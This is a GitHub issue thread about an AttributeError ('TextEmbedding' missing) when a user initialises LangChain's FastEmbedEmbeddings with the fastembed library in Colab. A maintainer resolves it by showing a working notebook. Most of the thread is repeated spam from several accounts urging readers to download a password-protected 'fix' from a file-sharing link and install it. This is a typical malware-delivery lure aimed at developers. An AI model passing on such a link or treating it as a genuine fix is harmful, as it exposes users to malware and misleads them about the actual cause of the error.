### ISSUE TITLE
AttributeError: module 'fastembed' has no attribute 'TextEmbedding'

### ISSUE THREAD

**Issue by KaifAhmad1** [qdrant/fastembed#334]
### What happened?

```  Python 
# Initialize embeddings
embeddings = FastEmbedEmbeddings(
    model_name="BAAI/bge-small-en-v1.5",
    max_length=512,
    batch_size=512,
    threads=8,
    parallel=True
)
```

``` 
---------------------------------------------------------------------------
AttributeError                            Traceback (most recent call last)
[<ipython-input-17-de927adb1d31>](https://localhost:8080/#) in <cell line: 9>()
      7 
      8 # Initialize embeddings
----> 9 embeddings = FastEmbedEmbeddings(
     10     model_name="BAAI/bge-small-en-v1.5",
     11     max_length=512,

3 frames
[/usr/local/lib/python3.10/dist-packages/langchain_community/embeddings/fastembed.py](https://localhost:8080/#) in validate_environment(cls, values)
     92             )
     93 
---> 94         values["_model"] = fastembed.TextEmbedding(
     95             model_name=model_name,
     96             max_length=max_length,

AttributeError: module 'fastembed' has no attribute 'TextEmbedding'
```

### What Python version are you on? e.g. python --version

fastembed=0.3.6
python=3.10.10 
cuda=12.1 
GPU=Tesla T4 Colab Enterprise 
OS=Windows 11 x64bit

### Version

0.2.7 (Latest)

### What os are you seeing the problem on?

Windows

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by I8dNLo** [comment]
Hi! Are you running your code in colab in browser, which is installed on Windows?

**Comment by I8dNLo** [comment]
Here is my try:
https://colab.research.google.com/drive/1Q8RBWlD1yiZGRXGsGKtTS3x2EtKr-pK4?usp=sharing

Looks like it works. Feel free to reopen it if you got some more details

**Comment by KaifAhmad1** [comment]
Thanks! @I8dNLo
